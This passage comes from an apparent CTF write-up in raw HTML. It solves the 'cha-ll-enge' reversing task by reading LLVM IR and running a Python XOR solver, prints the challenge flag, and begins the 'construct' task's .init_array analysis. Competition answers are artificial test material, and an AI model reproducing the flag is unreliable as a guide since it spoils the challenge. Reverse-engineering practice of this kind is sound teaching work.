url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA30lEQVQY052R3W6DMAyFw39IgHQhhA7aSaUdu9ombXv/VzuzXcG0214cObaT48+KOr+c8breMJ9mxBjRdR2stVBKPSY2+/75wvV2xcfnO9a3FdP0DB50oiE8aJonhNDDNhbGGNR1LUNZf/k9qjAEeewObi8aUwtp0zZi0pDKskSSJLvSNBVt5zzPkWUZ1HiMRLegJwKtNQyZVroSg6oqJRZFce8RzUbFuaZ7DCFG28pMuCwXMWzbFuNxxEA17z0ORO39k0S+N8SBVg/S5w245pwTwt3Q954+YxCyf40H9QsUJ4c+V/pHhgAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/78f2f657426df1b560115864ec16bc73/8ac56/image-20240616114006163.webp 240w,\n/static/78f2f657426df1b560115864ec16bc73/d3be9/image-20240616114006163.webp 480w,\n/static/78f2f657426df1b560115864ec16bc73/e46b2/image-20240616114006163.webp 960w,\n/static/78f2f657426df1b560115864ec16bc73/f992d/image-20240616114006163.webp 1440w,\n/static/78f2f657426df1b560115864ec16bc73/2dde2/image-20240616114006163.webp 1509w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/78f2f657426df1b560115864ec16bc73/8ff5a/image-20240616114006163.png 240w,\n/static/78f2f657426df1b560115864ec16bc73/e85cb/image-20240616114006163.png 
480w,\n/static/78f2f657426df1b560115864ec16bc73/d9199/image-20240616114006163.png 960w,\n/static/78f2f657426df1b560115864ec16bc73/07a9c/image-20240616114006163.png 1440w,\n/static/78f2f657426df1b560115864ec16bc73/faa22/image-20240616114006163.png 1509w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/78f2f657426df1b560115864ec16bc73/d9199/image-20240616114006163.png\"\n            alt=\"image-20240616114006163\"\n            title=\"image-20240616114006163\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h2 id=\"cha-ll-engerev\" style=\"position:relative;\"><a href=\"#cha-ll-engerev\" aria-label=\"cha ll engerev permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>cha-ll-enge(Rev)</h2>\n<blockquote>\n<p>It’s a file format I’ve never seen before, but looking at its contents might reveal something…?</p>\n</blockquote>\n<p>The challenge file is not a compiled binary but source text in LLVM IR (LLVM’s intermediate representation).</p>\n<p>At a glance, it’s clear that <code class=\"language-text\">@main</code> XORs each character of the input with the value at the same index in <code class=\"language-text\">@__const.main.key</code>, XORs that result with the next key value, and counts how many of the 49 results are 0; the input is accepted only if <code class=\"language-text\">strlen</code> returns 49 and all 49 checks pass.</p>\n<div class=\"gatsby-highlight\" 
data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">@__const.main.key <span class=\"token operator\">=</span> private unnamed_addr constant <span class=\"token punctuation\">[</span><span class=\"token number\">50</span> x i32<span class=\"token punctuation\">]</span> <span class=\"token punctuation\">[</span>i32 <span class=\"token number\">119</span>, i32 <span class=\"token number\">20</span>, i32 <span class=\"token number\">96</span>, i32 <span class=\"token number\">6</span>, i32 <span class=\"token number\">50</span>, i32 <span class=\"token number\">80</span>, i32 <span class=\"token number\">43</span>, i32 <span class=\"token number\">28</span>, i32 <span class=\"token number\">117</span>, i32 <span class=\"token number\">22</span>, i32 <span class=\"token number\">125</span>, i32 <span class=\"token number\">34</span>, i32 <span class=\"token number\">21</span>, i32 <span class=\"token number\">116</span>, i32 <span class=\"token number\">23</span>, i32 <span class=\"token number\">124</span>, i32 <span class=\"token number\">35</span>, i32 <span class=\"token number\">18</span>, i32 <span class=\"token number\">35</span>, i32 <span class=\"token number\">85</span>, i32 <span class=\"token number\">56</span>, i32 <span class=\"token number\">103</span>, i32 <span class=\"token number\">14</span>, i32 <span class=\"token number\">96</span>, i32 <span class=\"token number\">20</span>, i32 <span class=\"token number\">39</span>, i32 <span class=\"token number\">85</span>, i32 <span class=\"token number\">56</span>, i32 <span class=\"token number\">93</span>, i32 <span class=\"token number\">57</span>, i32 <span class=\"token number\">8</span>, i32 <span class=\"token number\">60</span>, i32 <span class=\"token number\">72</span>, i32 <span class=\"token number\">45</span>, i32 <span class=\"token number\">114</span>, i32 <span class=\"token number\">0</span>, i32 <span class=\"token number\">101</span>, i32 <span class=\"token 
number\">21</span>, i32 <span class=\"token number\">103</span>, i32 <span class=\"token number\">84</span>, i32 <span class=\"token number\">39</span>, i32 <span class=\"token number\">66</span>, i32 <span class=\"token number\">44</span>, i32 <span class=\"token number\">27</span>, i32 <span class=\"token number\">122</span>, i32 <span class=\"token number\">77</span>, i32 <span class=\"token number\">36</span>, i32 <span class=\"token number\">20</span>, i32 <span class=\"token number\">122</span>, i32 <span class=\"token number\">7</span><span class=\"token punctuation\">]</span>, align <span class=\"token number\">16</span>\n@.str <span class=\"token operator\">=</span> private unnamed_addr constant <span class=\"token punctuation\">[</span><span class=\"token number\">14</span> x i8<span class=\"token punctuation\">]</span> c<span class=\"token string\">\"Input FLAG : <span class=\"token entity\" title=\"\\00\">\\00</span>\"</span>, align <span class=\"token number\">1</span>\n@.str.1 <span class=\"token operator\">=</span> private unnamed_addr constant <span class=\"token punctuation\">[</span><span class=\"token number\">3</span> x i8<span class=\"token punctuation\">]</span> c<span class=\"token string\">\"%s<span class=\"token entity\" title=\"\\00\">\\00</span>\"</span>, align <span class=\"token number\">1</span>\n@.str.2 <span class=\"token operator\">=</span> private unnamed_addr constant <span class=\"token punctuation\">[</span><span class=\"token number\">22</span> x i8<span class=\"token punctuation\">]</span> c<span class=\"token string\">\"Correct! 
FLAG is %s.<span class=\"token entity\" title=\"\\0\">\\0</span>A<span class=\"token entity\" title=\"\\00\">\\00</span>\"</span>, align <span class=\"token number\">1</span>\n@.str.3 <span class=\"token operator\">=</span> private unnamed_addr constant <span class=\"token punctuation\">[</span><span class=\"token number\">16</span> x i8<span class=\"token punctuation\">]</span> c<span class=\"token string\">\"Incorrect FLAG.<span class=\"token entity\" title=\"\\00\">\\00</span>\"</span>, align <span class=\"token number\">1</span>\n\n<span class=\"token punctuation\">;</span> Function Attrs: noinline nounwind optnone uwtable\ndefine dso_local i32 @main<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token comment\">#0 {</span>\n  %1 <span class=\"token operator\">=</span> alloca i32, align <span class=\"token number\">4</span>\n  %2 <span class=\"token operator\">=</span> alloca <span class=\"token punctuation\">[</span><span class=\"token number\">70</span> x i8<span class=\"token punctuation\">]</span>, align <span class=\"token number\">16</span>\n  %3 <span class=\"token operator\">=</span> alloca <span class=\"token punctuation\">[</span><span class=\"token number\">50</span> x i32<span class=\"token punctuation\">]</span>, align <span class=\"token number\">16</span>\n  %4 <span class=\"token operator\">=</span> alloca i32, align <span class=\"token number\">4</span>\n  %5 <span class=\"token operator\">=</span> alloca i32, align <span class=\"token number\">4</span>\n  %6 <span class=\"token operator\">=</span> alloca i64, align <span class=\"token number\">8</span>\n  store i32 <span class=\"token number\">0</span>, i32* %1, align <span class=\"token number\">4</span>\n  %7 <span class=\"token operator\">=</span> bitcast <span class=\"token punctuation\">[</span><span class=\"token number\">50</span> x i32<span class=\"token punctuation\">]</span>* %3 to i8*\n  call void @llvm.memcpy.p0i8.p0i8.i64<span 
class=\"token punctuation\">(</span>i8* align <span class=\"token number\">16</span> %7, i8* align <span class=\"token number\">16</span> bitcast <span class=\"token punctuation\">(</span><span class=\"token punctuation\">[</span><span class=\"token number\">50</span> x i32<span class=\"token punctuation\">]</span>* @__const.main.key to i8*<span class=\"token punctuation\">)</span>, i64 <span class=\"token number\">200</span>, i1 <span class=\"token boolean\">false</span><span class=\"token punctuation\">)</span>\n  %8 <span class=\"token operator\">=</span> call i32 <span class=\"token punctuation\">(</span>i8*, <span class=\"token punctuation\">..</span>.<span class=\"token punctuation\">)</span> @printf<span class=\"token punctuation\">(</span>i8* noundef getelementptr inbounds <span class=\"token punctuation\">(</span><span class=\"token punctuation\">[</span><span class=\"token number\">14</span> x i8<span class=\"token punctuation\">]</span>, <span class=\"token punctuation\">[</span><span class=\"token number\">14</span> x i8<span class=\"token punctuation\">]</span>* @.str, i64 <span class=\"token number\">0</span>, i64 <span class=\"token number\">0</span><span class=\"token punctuation\">))</span>\n  %9 <span class=\"token operator\">=</span> getelementptr inbounds <span class=\"token punctuation\">[</span><span class=\"token number\">70</span> x i8<span class=\"token punctuation\">]</span>, <span class=\"token punctuation\">[</span><span class=\"token number\">70</span> x i8<span class=\"token punctuation\">]</span>* %2, i64 <span class=\"token number\">0</span>, i64 <span class=\"token number\">0</span>\n  %10 <span class=\"token operator\">=</span> call i32 <span class=\"token punctuation\">(</span>i8*, <span class=\"token punctuation\">..</span>.<span class=\"token punctuation\">)</span> @__isoc99_scanf<span class=\"token punctuation\">(</span>i8* noundef getelementptr inbounds <span class=\"token punctuation\">(</span><span class=\"token 
punctuation\">[</span><span class=\"token number\">3</span> x i8<span class=\"token punctuation\">]</span>, <span class=\"token punctuation\">[</span><span class=\"token number\">3</span> x i8<span class=\"token punctuation\">]</span>* @.str.1, i64 <span class=\"token number\">0</span>, i64 <span class=\"token number\">0</span><span class=\"token punctuation\">)</span>, i8* noundef %9<span class=\"token punctuation\">)</span>\n  %11 <span class=\"token operator\">=</span> getelementptr inbounds <span class=\"token punctuation\">[</span><span class=\"token number\">70</span> x i8<span class=\"token punctuation\">]</span>, <span class=\"token punctuation\">[</span><span class=\"token number\">70</span> x i8<span class=\"token punctuation\">]</span>* %2, i64 <span class=\"token number\">0</span>, i64 <span class=\"token number\">0</span>\n  %12 <span class=\"token operator\">=</span> call i64 @strlen<span class=\"token punctuation\">(</span>i8* noundef %11<span class=\"token punctuation\">)</span> <span class=\"token comment\">#4</span>\n  %13 <span class=\"token operator\">=</span> icmp eq i64 %12, <span class=\"token number\">49</span>\n  br i1 %13, label %14, label %48\n\n<span class=\"token number\">14</span>:                                               <span class=\"token punctuation\">;</span> preds <span class=\"token operator\">=</span> %0\n  store i32 <span class=\"token number\">0</span>, i32* %4, align <span class=\"token number\">4</span>\n  store i32 <span class=\"token number\">0</span>, i32* %5, align <span class=\"token number\">4</span>\n  store i64 <span class=\"token number\">0</span>, i64* %6, align <span class=\"token number\">8</span>\n  br label %15\n\n<span class=\"token number\">15</span>:                                               <span class=\"token punctuation\">;</span> preds <span class=\"token operator\">=</span> %38, %14\n  %16 <span class=\"token operator\">=</span> load i64, i64* %6, align <span class=\"token number\">8</span>\n  
%17 <span class=\"token operator\">=</span> icmp ult i64 %16, <span class=\"token number\">49</span>\n  br i1 %17, label %18, label %41\n\n<span class=\"token number\">18</span>:                                               <span class=\"token punctuation\">;</span> preds <span class=\"token operator\">=</span> %15\n  %19 <span class=\"token operator\">=</span> load i64, i64* %6, align <span class=\"token number\">8</span>\n  %20 <span class=\"token operator\">=</span> getelementptr inbounds <span class=\"token punctuation\">[</span><span class=\"token number\">70</span> x i8<span class=\"token punctuation\">]</span>, <span class=\"token punctuation\">[</span><span class=\"token number\">70</span> x i8<span class=\"token punctuation\">]</span>* %2, i64 <span class=\"token number\">0</span>, i64 %19\n  %21 <span class=\"token operator\">=</span> load i8, i8* %20, align <span class=\"token number\">1</span>\n  %22 <span class=\"token operator\">=</span> sext i8 %21 to i32\n  %23 <span class=\"token operator\">=</span> load i64, i64* %6, align <span class=\"token number\">8</span>\n  %24 <span class=\"token operator\">=</span> getelementptr inbounds <span class=\"token punctuation\">[</span><span class=\"token number\">50</span> x i32<span class=\"token punctuation\">]</span>, <span class=\"token punctuation\">[</span><span class=\"token number\">50</span> x i32<span class=\"token punctuation\">]</span>* %3, i64 <span class=\"token number\">0</span>, i64 %23\n  %25 <span class=\"token operator\">=</span> load i32, i32* %24, align <span class=\"token number\">4</span>\n  %26 <span class=\"token operator\">=</span> xor i32 %22, %25\n  %27 <span class=\"token operator\">=</span> load i64, i64* %6, align <span class=\"token number\">8</span>\n  %28 <span class=\"token operator\">=</span> <span class=\"token function\">add</span> i64 %27, <span class=\"token number\">1</span>\n  %29 <span class=\"token operator\">=</span> getelementptr inbounds <span class=\"token 
punctuation\">[</span><span class=\"token number\">50</span> x i32<span class=\"token punctuation\">]</span>, <span class=\"token punctuation\">[</span><span class=\"token number\">50</span> x i32<span class=\"token punctuation\">]</span>* %3, i64 <span class=\"token number\">0</span>, i64 %28\n  %30 <span class=\"token operator\">=</span> load i32, i32* %29, align <span class=\"token number\">4</span>\n  %31 <span class=\"token operator\">=</span> xor i32 %26, %30\n  store i32 %31, i32* %5, align <span class=\"token number\">4</span>\n  %32 <span class=\"token operator\">=</span> load i32, i32* %5, align <span class=\"token number\">4</span>\n  %33 <span class=\"token operator\">=</span> icmp eq i32 %32, <span class=\"token number\">0</span>\n  br i1 %33, label %34, label %37\n\n<span class=\"token number\">34</span>:                                               <span class=\"token punctuation\">;</span> preds <span class=\"token operator\">=</span> %18\n  %35 <span class=\"token operator\">=</span> load i32, i32* %4, align <span class=\"token number\">4</span>\n  %36 <span class=\"token operator\">=</span> <span class=\"token function\">add</span> nsw i32 %35, <span class=\"token number\">1</span>\n  store i32 %36, i32* %4, align <span class=\"token number\">4</span>\n  br label %37\n\n<span class=\"token number\">37</span>:                                               <span class=\"token punctuation\">;</span> preds <span class=\"token operator\">=</span> %34, %18\n  br label %38\n\n<span class=\"token number\">38</span>:                                               <span class=\"token punctuation\">;</span> preds <span class=\"token operator\">=</span> %37\n  %39 <span class=\"token operator\">=</span> load i64, i64* %6, align <span class=\"token number\">8</span>\n  %40 <span class=\"token operator\">=</span> <span class=\"token function\">add</span> i64 %39, <span class=\"token number\">1</span>\n  store i64 %40, i64* %6, align <span class=\"token 
number\">8</span>\n  br label %15, <span class=\"token operator\">!</span>llvm.loop <span class=\"token operator\">!</span><span class=\"token number\">6</span>\n\n<span class=\"token number\">41</span>:                                               <span class=\"token punctuation\">;</span> preds <span class=\"token operator\">=</span> %15\n  %42 <span class=\"token operator\">=</span> load i32, i32* %4, align <span class=\"token number\">4</span>\n  %43 <span class=\"token operator\">=</span> icmp eq i32 %42, <span class=\"token number\">49</span>\n  br i1 %43, label %44, label %47\n\n<span class=\"token number\">44</span>:                                               <span class=\"token punctuation\">;</span> preds <span class=\"token operator\">=</span> %41\n  %45 <span class=\"token operator\">=</span> getelementptr inbounds <span class=\"token punctuation\">[</span><span class=\"token number\">70</span> x i8<span class=\"token punctuation\">]</span>, <span class=\"token punctuation\">[</span><span class=\"token number\">70</span> x i8<span class=\"token punctuation\">]</span>* %2, i64 <span class=\"token number\">0</span>, i64 <span class=\"token number\">0</span>\n  %46 <span class=\"token operator\">=</span> call i32 <span class=\"token punctuation\">(</span>i8*, <span class=\"token punctuation\">..</span>.<span class=\"token punctuation\">)</span> @printf<span class=\"token punctuation\">(</span>i8* noundef getelementptr inbounds <span class=\"token punctuation\">(</span><span class=\"token punctuation\">[</span><span class=\"token number\">22</span> x i8<span class=\"token punctuation\">]</span>, <span class=\"token punctuation\">[</span><span class=\"token number\">22</span> x i8<span class=\"token punctuation\">]</span>* @.str.2, i64 <span class=\"token number\">0</span>, i64 <span class=\"token number\">0</span><span class=\"token punctuation\">)</span>, i8* noundef %45<span class=\"token punctuation\">)</span>\n  store i32 <span class=\"token 
number\">0</span>, i32* %1, align <span class=\"token number\">4</span>\n  br label %50\n\n<span class=\"token number\">47</span>:                                               <span class=\"token punctuation\">;</span> preds <span class=\"token operator\">=</span> %41\n  br label %48\n\n<span class=\"token number\">48</span>:                                               <span class=\"token punctuation\">;</span> preds <span class=\"token operator\">=</span> %47, %0\n  %49 <span class=\"token operator\">=</span> call i32 @puts<span class=\"token punctuation\">(</span>i8* noundef getelementptr inbounds <span class=\"token punctuation\">(</span><span class=\"token punctuation\">[</span><span class=\"token number\">16</span> x i8<span class=\"token punctuation\">]</span>, <span class=\"token punctuation\">[</span><span class=\"token number\">16</span> x i8<span class=\"token punctuation\">]</span>* @.str.3, i64 <span class=\"token number\">0</span>, i64 <span class=\"token number\">0</span><span class=\"token punctuation\">))</span>\n  store i32 <span class=\"token number\">1</span>, i32* %1, align <span class=\"token number\">4</span>\n  br label %50\n\n<span class=\"token number\">50</span>:                                               <span class=\"token punctuation\">;</span> preds <span class=\"token operator\">=</span> %48, %44\n  %51 <span class=\"token operator\">=</span> load i32, i32* %1, align <span class=\"token number\">4</span>\n  ret i32 %51\n<span class=\"token punctuation\">}</span></code></pre></div>\n<p>Therefore, by using the following solver to repeatedly XOR each key with the next key value, the flag could be easily identified.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\">key <span class=\"token operator\">=</span> <span class=\"token punctuation\">[</span><span class=\"token number\">119</span><span class=\"token punctuation\">,</span><span class=\"token 
number\">20</span><span class=\"token punctuation\">,</span><span class=\"token number\">96</span><span class=\"token punctuation\">,</span><span class=\"token number\">6</span><span class=\"token punctuation\">,</span><span class=\"token number\">50</span><span class=\"token punctuation\">,</span><span class=\"token number\">80</span><span class=\"token punctuation\">,</span><span class=\"token number\">43</span><span class=\"token punctuation\">,</span><span class=\"token number\">28</span><span class=\"token punctuation\">,</span><span class=\"token number\">117</span><span class=\"token punctuation\">,</span><span class=\"token number\">22</span><span class=\"token punctuation\">,</span><span class=\"token number\">125</span><span class=\"token punctuation\">,</span><span class=\"token number\">34</span><span class=\"token punctuation\">,</span><span class=\"token number\">21</span><span class=\"token punctuation\">,</span><span class=\"token number\">116</span><span class=\"token punctuation\">,</span><span class=\"token number\">23</span><span class=\"token punctuation\">,</span><span class=\"token number\">124</span><span class=\"token punctuation\">,</span><span class=\"token number\">35</span><span class=\"token punctuation\">,</span><span class=\"token number\">18</span><span class=\"token punctuation\">,</span><span class=\"token number\">35</span><span class=\"token punctuation\">,</span><span class=\"token number\">85</span><span class=\"token punctuation\">,</span><span class=\"token number\">56</span><span class=\"token punctuation\">,</span><span class=\"token number\">103</span><span class=\"token punctuation\">,</span><span class=\"token number\">14</span><span class=\"token punctuation\">,</span><span class=\"token number\">96</span><span class=\"token punctuation\">,</span><span class=\"token number\">20</span><span class=\"token punctuation\">,</span><span class=\"token number\">39</span><span class=\"token punctuation\">,</span><span 
class=\"token number\">85</span><span class=\"token punctuation\">,</span><span class=\"token number\">56</span><span class=\"token punctuation\">,</span><span class=\"token number\">93</span><span class=\"token punctuation\">,</span><span class=\"token number\">57</span><span class=\"token punctuation\">,</span><span class=\"token number\">8</span><span class=\"token punctuation\">,</span><span class=\"token number\">60</span><span class=\"token punctuation\">,</span><span class=\"token number\">72</span><span class=\"token punctuation\">,</span><span class=\"token number\">45</span><span class=\"token punctuation\">,</span><span class=\"token number\">114</span><span class=\"token punctuation\">,</span><span class=\"token number\">0</span><span class=\"token punctuation\">,</span><span class=\"token number\">101</span><span class=\"token punctuation\">,</span><span class=\"token number\">21</span><span class=\"token punctuation\">,</span><span class=\"token number\">103</span><span class=\"token punctuation\">,</span><span class=\"token number\">84</span><span class=\"token punctuation\">,</span><span class=\"token number\">39</span><span class=\"token punctuation\">,</span><span class=\"token number\">66</span><span class=\"token punctuation\">,</span><span class=\"token number\">44</span><span class=\"token punctuation\">,</span><span class=\"token number\">27</span><span class=\"token punctuation\">,</span><span class=\"token number\">122</span><span class=\"token punctuation\">,</span><span class=\"token number\">77</span><span class=\"token punctuation\">,</span><span class=\"token number\">36</span><span class=\"token punctuation\">,</span><span class=\"token number\">20</span><span class=\"token punctuation\">,</span><span class=\"token number\">122</span><span class=\"token punctuation\">,</span><span class=\"token number\">7</span><span class=\"token punctuation\">]</span>\n<span class=\"token keyword\">for</span> i <span class=\"token 
keyword\">in</span> <span class=\"token builtin\">range</span><span class=\"token punctuation\">(</span><span class=\"token number\">1</span><span class=\"token punctuation\">,</span><span class=\"token builtin\">len</span><span class=\"token punctuation\">(</span>key<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    <span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token builtin\">chr</span><span class=\"token punctuation\">(</span>key<span class=\"token punctuation\">[</span>i<span class=\"token operator\">-</span><span class=\"token number\">1</span><span class=\"token punctuation\">]</span><span class=\"token operator\">^</span>key<span class=\"token punctuation\">[</span>i<span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> end<span class=\"token operator\">=</span><span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span>\n    \n<span class=\"token comment\"># ctf4b{7ick_7ack_11vm_int3rmed14te_repr3sen7a7i0n}</span></code></pre></div>\n<h2 id=\"constructrev\" style=\"position:relative;\"><a href=\"#constructrev\" aria-label=\"constructrev permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>construct(Rev)</h2>\n<blockquote>\n<p>There seem to be a lot of unused functions…?</p>\n</blockquote>\n<p>Analyzing the challenge binary, the main function doesn’t perform any 
particularly notable operations, but a chain of functions is registered in <code class=\"language-text\">.init_array</code>.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 449px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/9394035879318735fa9c024967b03c24/053a9/image-20240615161025077.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 102.50000000000001%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/9394035879318735fa9c024967b03c24/8ac56/image-20240615161025077.webp 240w,\n/static/9394035879318735fa9c024967b03c24/57bab/image-20240615161025077.webp 449w\"\n              sizes=\"(max-width: 449px) 100vw, 449px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/9394035879318735fa9c024967b03c24/8ff5a/image-20240615161025077.png 240w,\n/static/9394035879318735fa9c024967b03c24/053a9/image-20240615161025077.png 449w\"\n            sizes=\"(max-width: 449px) 100vw, 449px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/9394035879318735fa9c024967b03c24/053a9/image-20240615161025077.png\"\n            alt=\"image-20240615161025077\"\n            title=\"image-20240615161025077\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>This is where an array of function pointers used for initialization at program startup 
is stored; these are executed before the main function.</p>\n<p>Therefore, I’ll examine the functions chained here from top to bottom.</p>\n<h3 id=\"check-for-command-line-arguments\" style=\"position:relative;\"><a href=\"#check-for-command-line-arguments\" aria-label=\"check for command line arguments permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Check for Command-Line Arguments</h3>\n<p>The first function appears to verify whether command-line arguments are present.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/73ab23e74d67f17676b58de084f42253/c6671/image-20240615161121587.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 37.5%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/73ab23e74d67f17676b58de084f42253/8ac56/image-20240615161121587.webp 240w,\n/static/73ab23e74d67f17676b58de084f42253/d3be9/image-20240615161121587.webp 480w,\n/static/73ab23e74d67f17676b58de084f42253/e46b2/image-20240615161121587.webp 
960w,\n/static/73ab23e74d67f17676b58de084f42253/ea1d1/image-20240615161121587.webp 1129w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/73ab23e74d67f17676b58de084f42253/8ff5a/image-20240615161121587.png 240w,\n/static/73ab23e74d67f17676b58de084f42253/e85cb/image-20240615161121587.png 480w,\n/static/73ab23e74d67f17676b58de084f42253/d9199/image-20240615161121587.png 960w,\n/static/73ab23e74d67f17676b58de084f42253/c6671/image-20240615161121587.png 1129w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/73ab23e74d67f17676b58de084f42253/d9199/image-20240615161121587.png\"\n            alt=\"image-20240615161121587\"\n            title=\"image-20240615161121587\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h3 id=\"validate-input-length-of-0x20-characters\" style=\"position:relative;\"><a href=\"#validate-input-length-of-0x20-characters\" aria-label=\"validate input length of 0x20 characters permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Validate Input Length of 0x20 Characters</h3>\n<p>The next function checks whether the length of the received command-line argument is 0x20 
characters.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 718px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/6191c69fac5d5b621a661be85f3824f5/57dc1/image-20240615161131582.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 37.083333333333336%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/6191c69fac5d5b621a661be85f3824f5/8ac56/image-20240615161131582.webp 240w,\n/static/6191c69fac5d5b621a661be85f3824f5/d3be9/image-20240615161131582.webp 480w,\n/static/6191c69fac5d5b621a661be85f3824f5/7d0c9/image-20240615161131582.webp 718w\"\n              sizes=\"(max-width: 718px) 100vw, 718px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/6191c69fac5d5b621a661be85f3824f5/8ff5a/image-20240615161131582.png 240w,\n/static/6191c69fac5d5b621a661be85f3824f5/e85cb/image-20240615161131582.png 480w,\n/static/6191c69fac5d5b621a661be85f3824f5/57dc1/image-20240615161131582.png 718w\"\n            sizes=\"(max-width: 718px) 100vw, 718px\"\n            type=\"image/png\"\n          />\n          <img\n            